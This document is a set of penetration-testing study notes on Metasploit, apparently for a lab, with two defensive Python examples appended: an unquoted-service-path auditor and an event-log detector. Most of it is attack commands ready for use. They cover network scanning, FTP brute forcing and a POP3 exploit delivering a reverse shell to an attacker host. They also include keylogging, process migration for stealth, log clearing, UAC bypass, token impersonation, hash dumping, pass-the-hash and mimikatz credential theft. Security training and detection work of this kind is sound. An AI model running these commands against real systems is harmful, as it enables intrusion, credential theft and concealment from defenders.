Metasploit

Start:

# msfconsole
> show -h

The show auxiliary command displays a long list of all the auxiliary modules in MSF, which can be used for various tasks such as information gathering (under the gather/ hierarchy), scanning and enumeration of various services (under the scanner/ hierarchy) and so on.

> show auxiliary

To use any auxiliary module, exploit or plugin, issue the use command with the module name appended to it. You can then use the info command to get more information about the specific module.

> use auxiliary/scanner/snmp/snmp_enum
> info

Now we need to figure out how to use this auxiliary module. The show options command displays all the parameters required to run it.

> show options
> set RHOSTS 10.11.1.1-254

We can also set the THREADS count to 10 for faster scanning.

> set THREADS 10
> show options
> run

Next is the SMB version scanner:

> use auxiliary/scanner/smb/smb_version
> show options
> setg RHOSTS 10.11.1.1-254
> setg THREADS 10
> run

WebDAV servers are often poorly configured and can lead to a quick and easy shell on a victim.

> use auxiliary/scanner/http/webdav_scanner
> show options
> run

Various Metasploit auxiliary modules include brute-force options, such as the ftp_login module in the example below:

# msfconsole -q
msf> search type:auxiliary login
msf> use auxiliary/scanner/ftp/ftp_login
msf auxiliary(ftp_login) > show options
msf auxiliary(ftp_login) > set PASS_FILE /root/password-file.txt
msf auxiliary(ftp_login) > set USERPASS_FILE /root/users.txt
msf auxiliary(ftp_login) > set RHOSTS 10.11.1.219
msf auxiliary(ftp_login) > run

If the postgresql service is started ahead of time, MSF logs findings and information about discovered hosts in a convenient, accessible database. To display all discovered hosts up to this point, give the hosts command within msfconsole.

msf > hosts

db_nmap is an MSF wrapper that scans hosts with Nmap and inserts the scan output into the MSF database.

> db_nmap
> db_nmap 10.11.1.1-254

Once the db_nmap scan is complete, we can search the Metasploit database for machines with specific open ports by using the -p parameter.

> services -p 443

Exploits:

# msfconsole
> search pop3
> use exploit/windows/pop3/seattlelab_pass
> info
> show options
> set RHOST 10.11.1.35
> show payloads
> set PAYLOAD windows/shell_reverse_tcp
> show options
> set LHOST 10.11.0.5
> exploit
shell>

windows/shell_reverse_tcp - Connect back to attacker and spawn a command shell
windows/shell/reverse_tcp - Connect back to attacker, spawn cmd shell (staged)

Download or Upload with Meterpreter:

List/Run Meterpreter scripts:

We can run scripts from within an msf session to do things like privesc and pillaging.

//list all scripts
meterpreter> run post/ <tab>
//run the script
meterpreter> run post/windows/gather/credentials/smartermail
//there are a lot of gathering scripts we can use (enum_services, enum_applications,

Migrate to processes:

This moves our payload process into another process where it is not as obvious.

meterpreter> ps
or
meterpreter> getpid    //shows the pid of the current process
meterpreter> migrate <pid>    //svchost is common
or
run post/windows/manage/migrate <pid>

Key Logger:

//Start
meterpreter> keyscan_start
//Dump after a certain amount of time
meterpreter> keyscan_dump
//Stop
meterpreter> keyscan_stop

//clear logs, will depend on privs
[DANGER] meterpreter> clearev
Do NOT do this unless allowed. If allowed in an engagement you should still back the logs up before deletion so they can be reviewed and restored if needed.

MSF privesc:

//Once we have a shell we can try an msf privesc autopwn which will try to escalate privs based off of what it sees.

//windows
//Check for UAC
msf> use post/windows/gather/win_privs
//Bypass UAC if needed
msf> search bypassuac
msf> use exploit/windows/local/<selection>
msf> sessions
msf> set session <>
msf> exploit
//autopwn
msf> getsystem
//we can also specify specific techniques with the -t flag
//check your privs. You can keep trying getsystem to keep climbing privs if it is working but you are, say, admin rather than system.

//*nix
//Enum system
msf> run post/linux/gather/enum_system
//The best thing we can do now is look for public exploits that fit the sysinfo and services. getsystem does not work on *nix, so we have to pick the scripts at exploit/<os>/local

Incognito:

A powerful tool to switch between users without needing passwords (token manipulation/passing). I think we need SYSTEM for this. Once we have a meterpreter shell:

meterpreter> use incognito
meterpreter> list_tokens -u
meterpreter> impersonate_token <token>    ex (note the double slash): els\\user
meterpreter> getuid

Unquoted service paths:

Look for and auto-pwn unquoted service paths:

msf> use exploit/windows/local/trusted_service_path

Hash Dump:

//need admin or better
meterpreter> run hashdump

Pass the Hash:

msf> use exploit/windows/smb/psexec
//in the options set SMBPass=<hash>, SMBUser, and RHOST
> run
//we need to specify a payload so we open a session after the pass
> sysinfo    //in new session?
//if we get a STATUS_ACCESS_DENIED then registry edits must be done to have this work.
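The defender's side of the unquoted service path item above, as an added example that is not part of these notes: an audit pass over service ImagePath values (a constructed sample, not read from a real registry) that flags paths containing spaces that are not wrapped in quotes and produces the corrected, quoted value to set. The extension list and the parsing of the executable portion are assumptions of this example.

```python
import re
from dataclasses import dataclass

# Constructed sample: service name -> ImagePath as it would appear under
# HKLM\SYSTEM\CurrentControlSet\Services\<name>\ImagePath. Not real hosts.
SAMPLE_SERVICES = {
    "GoodQuoted":  '"C:\\Program Files\\Vendor App\\svc.exe" -run',
    "NoSpaces":    'C:\\Windows\\System32\\svchost.exe -k netsvcs',
    "BadUnquoted": 'C:\\Program Files\\Vendor App\\bin\\svc.exe --service',
    "BadNoArgs":   'C:\\Program Files (x86)\\Other Vendor\\agent.exe',
    "Driver":      'System32\\drivers\\something.sys',
}

# Executable = everything up to the first .exe/.com/.bat/.cmd; rest = args.
_EXE = re.compile(r'^(.*?\.(?:exe|com|bat|cmd))(\s.*)?$', re.IGNORECASE)

@dataclass
class Finding:
    name: str
    image_path: str
    fixed_path: str   # the quoted value an admin should set instead

def split_image_path(image_path):
    """Return (executable, args) for an ImagePath value."""
    s = image_path.strip()
    if s.startswith('"'):                 # already quoted: take the quoted part
        end = s.find('"', 1)
        if end < 0:
            return s[1:], ""
        return s[1:end], s[end + 1:].strip()
    m = _EXE.match(s)
    if m:
        return m.group(1), (m.group(2) or "").strip()
    return s, ""                          # drivers etc.: no args assumed

def is_unquoted_with_spaces(image_path):
    s = image_path.strip()
    if s.startswith('"'):
        return False
    exe, _ = split_image_path(s)
    return " " in exe

def audit_services(services):
    findings = []
    for name, path in services.items():
        if is_unquoted_with_spaces(path):
            exe, args = split_image_path(path)
            fixed = f'"{exe}"' + (f" {args}" if args else "")
            findings.append(Finding(name, path, fixed))
    return findings

if __name__ == "__main__":
    for f in audit_services(SAMPLE_SERVICES):
        print(f"{f.name}: {f.image_path!r} -> {f.fixed_path!r}")
```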

Pass the Hash for RDP login:

# xfreerdp /u:admin /d:foocorp /pth:<ntlmhash> /v:172.16.22.119

Mimikatz:

Best loaded into a 64-bit meterpreter process for full functionality. Verify this with sysinfo; if we need to migrate then:

meterpreter> ps -A x86_64 -s
meterpreter> migrate <pid>
meterpreter> sysinfo
meterpreter> load mimikatz
//search for creds
meterpreter> wdigest

WCE:

Windows Credentials Editor must first be uploaded, then it can be used to find creds.
https://web.archive.org/web/20200414231958/http:/www.ampliasecurity.com/research/windows-credentials-editor/

meterpreter> execute -i -f wce.exe -a -h

Switch from meterpreter to a system-native shell:

meterpreter> shell

Check running services:

run service_manager -l
or
run post/windows/gather/enum_services

Enable RDP service:

> run getgui -e
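The three actions above that leave the loudest host-side traces are clearev (Security event 1102 / System event 104, log cleared), psexec (System event 7045, a new service installed) and getgui -e (RDP enabled by setting fDenyTSConnections to 0, visible as a Sysmon event 13 registry write). As an added example that is not part of these notes, here is a small detection pass over constructed, SIEM-style normalised events; the "random service name" and "%SYSTEMROOT% root" heuristics for 7045 are assumptions of this example, not a Metasploit signature.

```python
import re

# Constructed sample events (not real logs), flattened the way a SIEM might
# normalise Windows Security/System/Sysmon records.
SAMPLE_EVENTS = [
    {"log": "System", "id": 7045, "ServiceName": "Windows Update",
     "ImagePath": "C:\\Windows\\System32\\svchost.exe -k netsvcs"},
    {"log": "System", "id": 7045, "ServiceName": "kPzqWxLbNeAd",
     "ImagePath": "%SYSTEMROOT%\\kPzqWxLb.exe"},
    {"log": "Sysmon", "id": 13,
     "TargetObject": "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\fDenyTSConnections",
     "Details": "DWORD (0x00000000)"},
    {"log": "Security", "id": 1102, "SubjectUserName": "svc-backup"},
    {"log": "Security", "id": 4624, "LogonType": "3"},
]

# Heuristic (assumption): a service name that is one run of letters with no
# spaces or digits, as auto-generated names tend to be.
_RANDOM_NAME = re.compile(r"^[A-Za-z]{8,16}$")

def check_event(ev):
    """Return an alert string for one event, or None if nothing matched."""
    if ev["log"] == "Security" and ev["id"] == 1102:
        return "security log cleared by %s" % ev.get("SubjectUserName", "?")
    if ev["log"] == "System" and ev["id"] == 104:
        return "system log cleared"
    if ev["log"] == "System" and ev["id"] == 7045:
        name, path = ev.get("ServiceName", ""), ev.get("ImagePath", "")
        low = path.lower()
        # random-looking name outside System32, or a command interpreter as
        # the service binary, is worth a look
        if (_RANDOM_NAME.match(name) and "\\system32\\" not in low) \
                or "cmd.exe /c" in low or "powershell" in low:
            return "suspicious service installed: %s -> %s" % (name, path)
    if ev["log"] == "Sysmon" and ev["id"] == 13:
        if ev.get("TargetObject", "").lower().endswith("fdenytsconnections") \
                and ev.get("Details", "").endswith("(0x00000000)"):
            return "RDP enabled via fDenyTSConnections=0"
    return None

def scan(events):
    """Run every event through check_event and keep the alerts."""
    return [a for a in (check_event(e) for e in events) if a]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print("ALERT:", alert)
```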
